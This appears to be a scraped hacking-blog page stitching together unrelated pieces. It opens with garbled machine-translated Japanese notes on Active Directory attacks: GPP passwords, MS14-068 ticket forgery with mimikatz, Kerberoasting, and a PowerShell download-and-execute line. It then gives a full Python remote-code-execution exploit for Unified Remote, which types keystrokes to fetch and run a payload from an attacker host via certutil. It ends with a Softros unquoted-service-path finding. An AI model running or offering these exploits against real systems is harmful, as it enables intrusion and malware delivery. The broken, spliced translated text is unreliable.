Sysvolでパスワードと攻撃GPPを見つける(グループポリシーの設定) Windows Server 2008 R2:4マネジメントSYSVOLフォルダー sysvolでパスワードを見つけて、グループポリシーの設定を活用してください Sysvolを使用してグループポリシーに保存されたパスワードを復元します 守る: GPOを管理するために使用されるコンピューターにKB2962486をインストールして、新しい資格情報がグループポリシーの設定に配置されないようにします。 すべての人にアクセス権を設定します グループポリシーでは使用されていないドメイン制御パスワード 共有フォルダーSYSVOLのアクセス権限を設定します 既存のGPPにパスワードを含むXMLファイルを削除します。 ms14-068 kerberos Kerberosの名前は、西部神話の地獄の門を守っている3頭の犬の名前です。この名前を使用する唯一の理由は、Kerberosが取引を完了するために3つの当事者の共同参加を必要とすることです。 Kerberosは、Windows Active Directoryで使用されるクライアント/サーバー認証プロトコルであり、両当事者が通信するための双方向ID認証を提供します。サービスを相互に認証または要求するエンティティは、元本(科目)と呼ばれます。参加している中央サーバーは、略してキー配布センターKDCと呼ばれます)。 KDCは、認証サーバー(AS)とチケット付与サーバー(TGS)の2つのサービスで構成されています。 Windowsドメイン環境では、認証サービスとチケット助成金サービスは、任意の任意のドメイン制御サーバーで同時に実行できます。 その他の読み物: Kerberosプロトコルの乱用 Kerberosの仕組み 最も基本的な問題は、許可属性証明書を偽造できることです。許可属性証明書は、アカウントのユーザー名、ID、グループメンバー、その他の情報を保存します。ドメインユーザーの基本情報を習得することにより、ドメイン管理者の権限を取得できます。 攻撃者は、有効なKerberos TGT認証チケットを効果的に書き換えて、ドメイン管理者(およびエンタープライズ管理者)になることができます https://github.com/bidoord/pykek/archive/master.zip https://github.com/gentilkiwi/mimikatz/releases/ apt-getインストールkrb5ユーザー apt-get install rdate MS14-068プロセス: 標準ユーザーとしてPACなしでKerberosTGT認定チケットをリクエストし、DC返信TGT 偽のPACはキーなしで生成されるため、生成されたPACは、HMAC_MD5「署名」の代わりにMD5アルゴリズムを使用してドメインユーザーのパスワードデータを使用します。 TGSサービスチケットリクエストの一部として、偽のPACは、PACのないTGTをDCに送信するための許可されたデータとして使用されます。 DCはこれに混乱しているように見えるため、ユーザーが送信したPACフリーTGTを廃止し、新しいTGTを作成し、偽のPACを独自の承認データに挿入し、このTGTをユーザーに送信します。 この偽のPAC TGTにより、ユーザーは脆弱なDCのドメイン管理者になることができます。 whoami /user python ms14-068.py -u domainユーザー@domain name -pパスワード-sユーザーsid -dドメインホスト キャッシュされたチケットを生成し、現在のカリの下でそれらを生成してから、ドメインユーザーマシンに入れます。 Mimikatzを使用して、TGT_DOMOMAINUSER@SERVER.COM.CCACHEを作成し、メモリしてキャッシュ証明書を作成するために取得しました。 mimikatz.exe 'kerberos:3360ptc c:tgt_darthsidious@pentest.com.ccache' exit KLISTビュー 正味使用k: \ pentest.comc $ ディレクトリK: 関連情報: KerberosのツールキットPykek MS14-068の脆弱性の詳細な解釈 Kerberosのセキュリティの脆弱性 守る: インストールKB3011780のインストールを確認してください SPNスキャン Kerberoastは、ターゲットシステムにパケットを送信せずに、Active Directoryから通常のユーザーとしてサービスアカウントの資格情報を抽出する効果的な方法として使用できます。 SPNは、Kerberos認証を使用するネットワーク上のサービスのユニークな識別子です。サービスクラス、ホスト名、ポートで構成されています。 Kerberos認証を使用したネットワークでは、Networkservice、LocalSystem、ユーザーアカウントなどの組み込みコンピューターアカウントの下にサーバーにSPNを登録する必要があります。組み込みアカウントの場合、SPNは自動的に登録されます。ただし、Domainユーザーアカウントでサービスを実行する場合は、使用するアカウントのSPNを手動で登録する必要があります。 SPNスキャンの主な利点は、SPNスキャンがサービスポートを確認するためにネットワーク上の各IPに接続する必要がないことです。 SPNはLDAPクエリを介してサービスを実行します。 SPNクエリはKerberosのチケット動作の一部であるため、SPNスキャンを検出することは困難です。 Powershell -exec bypass -command 'iex(new-object net.webclient).downloadString(' https://raw.githubusercontent.com/pyrotek3/powershell-ad-recon/master/discover-psmssqlservers ');発見-PSMSSQLSERVERS' SQL Serverスクリプトをスキャンします import-module .get-sqlserveraccess.psm1 PS C:GET-SQLSERVER-ESCALATE-CHECKACCESS [*] --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] domain: mydomain.com [*] DC: DC1.MYDOMAIN.COM [*] DCのSQL ServerインスタンスのリストをMyDomainMyUserとして取得. [*] LDAPで見つかった5 SQL Serverインスタンス。 [*] MyDomainMyUserとして5つのSQL Serverインスタンスにログインしようとしています. [*] --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ - ]失敗-server1.mydomain.comはpingに応答していません [ - ]失敗-server2.mydomain.com(192.168.1.102)が増えましたが、認証/クエリに失敗しました [+]成功! -server3.mydomain.com、1433(192.168.1.103)-sysadmin: no -svcisda: no [+]成功! -server3.mydomain.comsqlexpress(192.168.1.103)-sysadmin: no -svcisda: no [+]成功! -server4.mydomain.comAppdata(192.168.1.104)-Sysadmin:はい-SVCISDA:はい [*] --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [*] 5つのSQLサーバーインスタンスのうち3つにアクセスできます。 [*]終了時間: 04/01/2014 10:02:00 [*]合計時間: 00:02:00 [*] --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- LDAP経由で広告からSQLサーバーのリストを取得し、現在のドメインユーザーで各SQLサーバーにログインしようとします。これらはCSVファイルに出力されます。 PS C:GET -SQLSERVERACCESS -SHOWSUM | Export-CSV C:TEMPSQL-SERVER-EXCESSIVE-PRIVS.CSV [*] --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] domain: mydomain.com [*] dc: dc1.mydomain.com [*] MyDomainMyUserとしてDCからSQL Serverインスタンスのリストを取得. [*] LDAPで見つかった5 SQL Serverインスタンス。 [*] MyDomainMyUserとして5つのSQL Serverインスタンスにログインしようとしています. [*] --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ - ]失敗-server1.mydomain.comはpingに応答していません [ - ]失敗-server2.mydomain.com(192.168.1.102)が増えましたが、認証/クエリに失敗しました [+]成功! -server3.mydomain.com、1433(192.168.1.103)-sysadmin: no -svcisda: no [+]成功! -server3.mydomain.comsqlexpress(192.168.1.103)-sysadmin: no -svcisda: no [+]成功! -server4.mydomain.comAppdata(192.168.1.104)-Sysadmin:はい-SVCISDA:はい [*] --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [*] 5つのSQLサーバーインスタンスのうち3つにアクセスできます。 [*]終了時間: 04/01/2014 10:02:00 [*]合計時間: 00:02:00 [*] --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- より悪いパスワード推測 get -sqlserveraccess -sqluser sa -sqlpass 123qwe!@# 機密データを見つけます get -sqlServerAccess- query 'マスターから「データベース」として名前を選択します。 その他の参照: 非スキャンSQLサーバーの発見 関連情報: SPNスキャン SQLServerのスクリプトをスキャンします Kerberosのゴールデンチケット https://Adsecurity.org/?p=1640 ドメインサービスアカウントの割れ練習 Kerberos認定原則 Windowsセキュリティ認証メカニズムntlm&kerberosを深く理解する Kerberos認証プロセス パスワードはNTLMハッシュに変換され、タイムスタンプはハッシュを使用して暗号化され、認証チケット(TGT)リクエスト(AS-REQ)で認証券としてKDCに送信されます。 ドメインコントローラー(KDC)は、ユーザー情報(ログイン制限、グループメンバーシップなど)をチェックし、グラントチケット(TGT)へのチケットを作成します。 TGTは暗号化され、署名され、ユーザーに配信されます(AS-REP)。ドメイン内のKerberosサービス(KRBTGT)のみがTGTデータをオンにして読み取ることができます。 ユーザーはそうです
  24. HireHackking

    Unified Remote 3.9.0.2463 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution # Author: H4rk3nz0 # Vendor Homepage: https://www.unifiedremote.com/ # Software Link: https://www.unifiedremote.com/download # Tested on: Windows 10, 10.0.19042 Build 19042 #!/usr/bin/python import socket import sys import os from time import sleep target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port = 9512 # Packet Data Declarations; Windows, Space and Enter have non-standard values open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862" "2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400" "0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831" "000356657273696f6e000000000a00").decode("hex") open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7" "3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453" "796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646" "5643430373664653736366464363134343336313938303961643766333538353864343439320008526571" "75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000" ).decode("hex") one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024" "c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756" "5730002000556616c756500").decode("hex") two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007" "0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex") three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730" "386531346535323834636238310000").decode("hex") win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726" "400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065" "6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797" "0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055" "6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6" "9642d643730386531346535323834636238310000").decode("hex") ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172" "6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000" "656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000" "08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730" "002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365" "00616e64726f69642d643730386531346535323834636238310000").decode("hex") space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6" "1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617" "3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650" "00008547970650008000000085265717565737400070252756e0002457874726173000656616c756" "5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726" "36500616e64726f69642d643730386531346535323834636238310000").decode("hex") # ASCII to Hex Conversion Set characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", "+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} # User Specified arguments try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>") # Send Windows Key Input Twice def SendWin(): target.sendto(win_key,(rhost, port)) target.sendto(win_key,(rhost, port)) sleep(0.4) # Send Enter/Return Key Input def SendReturn(): target.sendto(ret_key,(rhost, port)) sleep(0.4) # Send String Characters def SendString(string, rhost): for char in string: if char == " ": target.sendto(space_key,(rhost, port)) sleep(0.02) else: convert = characters[char].decode("hex") target.sendto(one + convert + two + convert + three,(rhost, port)) sleep(0.02) # Main Execution def main(): target.connect((rhost,port)) sleep(0.5) print("[+] Connecting to target...") target.sendto(open,(rhost,port)) # Initialize Connection to Unified sleep(0.02) target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection print("[+] Popping Start Menu") sleep(0.02) SendWin() sleep(0.3) print("[+] Opening CMD") SendString("cmd.exe", rhost) sleep(0.3) SendReturn() sleep(0.3) print("[+] *Super Fast Hacker Typing*") SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload sleep(0.3) print("[+] Downloading Payload") SendReturn() sleep(3) SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload sleep(0.3) SendReturn() print("[+] Done! Check listener?") target.close() if __name__=="__main__": main()
  25. HireHackking

    Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path # Discovery by: Victor Mondragón # Discovery Date: 23-02-2021 # Vendor Homepage: https://www.softros.com/ # Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe # Tested Version: 9.6.4 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ Softros Spell Checker SoftrosSpellChecker C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe Auto C:\>sc qc SoftrosSpellChecker [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SoftrosSpellChecker TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe GRUPO_ORDEN_CARGA : System Reserved ETIQUETA : 0 NOMBRE_MOSTRAR : Softros Spell Checker DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem